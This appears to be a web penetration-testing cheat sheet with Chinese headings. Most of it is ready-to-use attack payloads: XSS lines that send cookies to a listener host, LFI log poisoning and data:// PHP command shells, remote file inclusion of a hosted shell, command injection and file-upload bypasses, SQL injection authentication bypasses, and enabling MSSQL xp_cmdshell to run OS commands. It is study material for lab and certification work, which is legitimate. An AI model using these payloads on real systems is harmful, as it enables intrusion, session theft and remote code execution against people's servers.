
Web 基础

目录枚举

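# Directory / file enumeration
# Three tools doing the same job; the target is set once so the list can be reused.
# These are noisy (thousands of requests) — confirm the host is in scope before running them.
TARGET="http://1.1.1.1"

# gobuster: -t sets concurrency; -x tries the same extensions as dirsearch below so results are comparable
gobuster dir -w dict.txt -t 10 -x php,txt,pdf,html --url "$TARGET"
# dirsearch: -f forces the listed extensions onto every wordlist entry
dirsearch -u "$TARGET" -f -e php,txt,pdf,html
# feroxbuster: --no-state skips writing the resume file; 404 responses are hidden
feroxbuster -u "$TARGET" --no-state --filter-status 404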

WordPress

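# WordPress enumeration with wpscan
# The API token only enriches results with vulnerability data. Quote it so a token with
# special characters survives word splitting; note it is still visible in `ps` output.
WP_URL="http://10.168.1.63/wordpress/"

## Default scan: version, theme, commonly used plugins, interesting files
wpscan --url "$WP_URL" --api-token "$wp_token"
## Enumerate all known plugins with aggressive detection (one request per plugin; slow and noisy)
wpscan --url "$WP_URL" --api-token "$wp_token" -e ap --plugins-detection aggressive
## Enumerate usernames (author archives, REST API, login error messages)
wpscan --url "$WP_URL" --api-token "$wp_token" -e u
## Password attack against a known user: -U names the user(s), -P the wordlist.
## `-e u` only enumerates and does not take a username — the user goes to -U/--usernames.
## Login attempts are logged and may trigger lockout plugins, so keep the wordlist small.
wpscan --url "$WP_URL" --api-token "$wp_token" -U james -P /usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100.txt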

模糊测试

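# Subdomain / virtual-host enumeration via the Host header
# Every vhost on a shared IP answers, usually with the same default page, so use
# -ac (auto-calibration) or an explicit -fs/-fw filter — otherwise every word "hits".
ffuf -u "http://colorlib.info" -H "host: FUZZ.colorlib.info" -w /usr/share/seclists/Discovery/DNS/subdomains-spanish.txt -ac

# Parameter discovery combined with LFI value fuzzing
# Two wordlists with named keywords run in clusterbomb mode (every name x every value).
# -fs 0 hides empty responses; -c colours the output.
## Wordlist paths relative to the current directory
ffuf -u "http://172.16.33.18/console/file.php?COMM=VUL" -w common.txt:COMM -w ../../Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt:VUL -c -fs 0
## Same request with the SecLists absolute paths
ffuf -u "http://172.16.33.18/console/file.php?A=B" -w /usr/share/seclists/Discovery/Web-Content/common.txt:A -w /usr/share/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt:B -c -fs 0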

API 访问

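# Typical probes against a JSON API
API="http://1.1.1.1"

## GET the login endpoint with response headers (-i): a 405 and its Allow header reveal supported methods
curl -i "$API/users/v1/login"
## POST a JSON body (-d implies POST); the Content-Type header is required by most JSON endpoints
curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' "$API/users/v1/login"
## Mass-assignment test: register with an extra "admin" field and check whether the server honours it
curl -d '{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H 'Content-Type: application/json' "$API/users/v1/register"
## Log in as the freshly created account
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json' "$API/users/v1/login"
## Route the request through an intercepting proxy (e.g. Burp on 8080) to inspect and replay it
curl --proxy 127.0.0.1:8080 -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json' "$API/users/v1/login"

# Endpoint brute force: APIs often keep v1 and v2 side by side.
# Put the two lines below in a pattern file and pass it with `gobuster dir -p pattern.txt ...`;
# {GOBUSTER} is replaced by each wordlist entry.
{GOBUSTER}/v1
{GOBUSTER}/v2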

XSS(跨站脚本攻击)

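<!-- XSS payloads -->
<!-- Basic script tag: proves that injected markup executes -->
<script>alert(123)</script>
<!-- Cookie exfiltration to a listener. String concatenation only happens inside JavaScript:
     an HTML src attribute is a literal, so src="http://.../?a="+document.cookie never reads
     the cookie. Use an event handler or a script instead. Cookies flagged HttpOnly are not
     exposed through document.cookie at all. -->
<img src="x" onerror="new Image().src='http://10.1.8.26/?a='+document.cookie" height="0" width="0">
<script>new Image().src="http://10.1.8.26/cool.jpg?"+document.cookie;</script>
<!-- Event handler on body: per the HTML parsing rules a second <body> tag merges its
     attributes into the existing body, so this fires even when injected mid-document -->
<body onload=alert("XSS")>
<!-- Attribute-based: the broken image fires onerror. The javascript: prefix is parsed as a
     JS label inside a handler and does nothing; onerror="alert(1)" is equivalent -->
<img src="X" onerror="javascript:alert(1)">

<!-- Filter bypasses -->
<!-- Mixed case defeats case-sensitive blacklists (tag names are case-insensitive in HTML) -->
<sCript>alert(1)</Script>
<!-- Nesting defeats a filter that strips "<script>" once, non-recursively -->
<scr<script>ipt>alert(1)</scr</script>ipt>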

路径遍历(目录穿越)

# Path traversal payloads for a `page` parameter that reads a file.
# The number of ../ only has to be >= the real depth; extra ones are harmless on both Linux and Windows.
# /etc/passwd is the usual world-readable proof-of-read on Linux
page=../../../../../../etc/passwd
# Private keys are readable only if the web server's user can read that home directory
# — the username (offsec) is lab-specific, adjust it to the target
page=../../../../../../home/offsec/.ssh/id_rsa
page=../../../../../../home/offsec/.ssh/id_ed25519
# Windows: forward slashes are accepted; hosts is a safe world-readable test file
page=../../../../../../../../windows/system32/drivers/etc/hosts

文件包含

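# ------------ Local file inclusion ------------
# Via the web server access log
## 1. Send any request whose User-Agent is the PHP one-liner <?php system($_GET['cmd']); ?>
##    (the UA is written verbatim into access.log)
## 2. Include the log and pass the command. The log must be readable by the web user:
##    Debian/Ubuntu ship /var/log/apache2 as root:adm 0750, so this often fails on hardened hosts.
http://1.1.1.1/index.php?page=../../../../../../var/log/apache2/access.log&cmd=ps

# Via the SSH auth log
## A failed login for a non-existent user is logged as "Invalid user <name> from <ip>",
## so the PHP one-liner can be smuggled in as the username. Pass it on the command line —
## an unquoted ssh_config `User` value containing spaces is rejected ("garbage at end of line").
ssh '<?php system($_GET["cmd"]); ?>'@1.1.1.1
## Then include auth.log (root:adm 0640 by default, so readable only if permissions were relaxed;
## on journald-only hosts there may be no auth.log at all)
http://1.1.1.1/file.php?file=/var/log/auth.log&cmd=id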

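# PHP stream wrappers
# data:// and php://input are only available when allow_url_include=On (Off by default since PHP 5.2);
# php://filter works with the default configuration. `file`/`page` is whatever the vulnerable
# parameter is called in the target application.

## data:// with an inline payload — spaces and quotes in the URL are fragile; prefer base64 below
http://10.11.0.22/file.php?file=data:text/plain,<?php echo shell_exec("ls ");?>

## data:// base64. The MIME type is `text/plain` (no leading slash) and the blob decodes to
##   <?php $var=shell_exec($_GET['cmd']); echo $var;?>
## Always round-trip a payload with `base64 -d` before use — a single wrong byte silently
## leaves you echoing the wrong variable with no error.
http://10.11.0.22/file.php?file=data:text/plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhcjs/Pg==&cmd=id

## php://filter — read source instead of executing it (base64 stops the PHP tags from running)
http://10.11.0.22/file.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php
http://10.11.0.22/file.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../etc/passwd
## No filter in the chain: behaves like including the file directly
http://10.11.0.22/file.php?page=php://filter/resource=/etc/passwd
## Write side: only useful when the application writes to the path (file_put_contents),
## not when it includes it. MTIzCg== is "123\n".
http://10.11.0.22/file.php?page=php://filter/write=convert.base64-decode/resource=test.php&txt=MTIzCg==

## php://input executes the raw POST body
POST:http://127.0.0.1/cmd.php?cmd=php://input
data:<?php phpinfo()?>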

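# ------------ Remote file inclusion ------------
# Only works when php.ini has both allow_url_fopen=On and allow_url_include=On
# (the latter is Off by default). include() executes whatever the remote server returns,
# so host the payload with a non-PHP extension or from a server that does not run PHP
# (e.g. python3 -m http.server) — otherwise your own box executes the shell instead of the target.
http://10.1.0.2/menu.php?file=http://10.1.0.4/shell.txt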

# ------------ Commonly targeted files ------------
# Useful for confirming an LFI and for post-exploitation recon. Readability depends on the
# web server's user: /etc/shadow is root-only and will normally fail.
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
# May contain database credentials
/etc/mysql/my.cnf
# Open file descriptors of a process (e.g. log files the web server keeps open). For the
# server's own process (self) this reads through the descriptor even when the log path is not readable.
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
# Environment of the web server process. Under classic CGI the request headers appear here,
# making it another injection point for a PHP one-liner (e.g. via User-Agent) — TODO confirm for this SAPI
/proc/self/environ
# Kernel version and boot parameters — input for privilege-escalation research
/proc/version
/proc/cmdline

命令注入

# Command injection: the input is appended to a shell command such as `ping <input>`
# && runs the injected command only if the first one succeeds
127.0.0.1 && id
# ; runs it unconditionally
127.0.0.1 ; env
# & backgrounds the first command and runs the second immediately
127.0.0.1 & id
# | pipes the first command's output into the injected one (no whitespace needed)
127.0.0.1|id
# Wildcard matching: when the filename itself is filtered, glob patterns still expand in the shell
;cat flag.txt -> flag.* -> flag.?xt
# Space bypass: $IFS is the shell's field separator (a space by default);
# $9 is an empty positional parameter whose only job is to terminate the variable name
ls$IFS$9test.txt
# Quotes inside a word are removed by the shell, which breaks simple substring filters
cat$IFS$9test.t'x't

文件上传

# Extension bypass: alternative extensions a handler may still map to PHP
# (depends entirely on the server's AddHandler/AddType configuration)
.php5
.php7
.phtml
.php.shtml
# Null-byte truncation — only PHP < 5.3.4: the check sees .jpg, the filesystem call sees .php
.php%00.jpg

# Content-Type: the MIME header is attacker-controlled, so a whitelist on it alone proves nothing
Content-Type:image/png

# .htaccess: makes Apache execute .png files in that directory as PHP.
# Typically needs AllowOverride to permit FileInfo and PHP running as an Apache module.
echo "AddType application/x-httpd-php .png" > .htaccess

# Windows filename normalisation: trailing spaces and dots are stripped on save, and ::$DATA
# selects the default NTFS data stream, so all three end up on disk as 1.php
1.php[space]
1.php............
1.php::$DATA

# Parsing quirks
# Apache with a loose AddHandler evaluates every extension, so a name containing .php runs as PHP
1.php.zxyw
# Nginx + PHP-FPM with cgi.fix_pathinfo=1 executes 1.jpg as PHP when /.php is appended to the path
1.jpg/.php

SQL 注入

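# Detect injection: characters that break string/numeric context and produce an error or a behaviour change
'
"
[
]
(
)
%

# Authentication bypass
# `--` comments to end of line in MSSQL/PostgreSQL/Oracle, but MySQL requires whitespace after it;
# `-- -` keeps the space visible and survives trimming (or use `#`). Without it the trailing
# quote of the original query is not commented out and the statement errors on MySQL.
admin'-- -
admin' or 1=1;-- -
1' or '1'='1
# LIMIT returns a single row where the login code expects exactly one (MySQL)
admin' or 1=1 limit 1;-- -
admin' or 1=1 limit 0,1-- -

# Boolean-based blind (MySQL): leak the database name one bit at a time.
# BIN(ASCII(c)) is the character's bit string; compare each position against 1/0
1' or SUBSTR(BIN(ASCII(Substr(Database(),1,1))),1,1)=1 limit 0,1#

# Column count: increase until ORDER BY errors
1' order by 2#

# UNION: the column count must match the original query
1' union select 1,2#
1' union select user(),database()#

# All tables with their schema (requires read access to information_schema)
' union select table_name,table_schema from information_schema.tables#

# Tables in one schema
' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

# Columns of one table
' union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

# MSSQL (stacked queries with `;` are allowed here)
# Time-based detection
a'; WAITFOR DELAY '0:0:5'--
# Delay only if xp_cmdshell is already enabled
a';IF ((SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell')=1) WAITFOR DELAY '0:0:5'--

# Enable xp_cmdshell (requires sysadmin; one request per line, or chain them in a single request)
a';EXECUTE sp_configure 'show advanced options', 1;--
a';RECONFIGURE;--
a';EXECUTE sp_configure 'xp_cmdshell', 1;--
a';RECONFIGURE;--

# Run an OS command — the command is a quoted string literal; an undeclared @cmd variable errors out
a';EXEC master..xp_cmdshell 'whoami';--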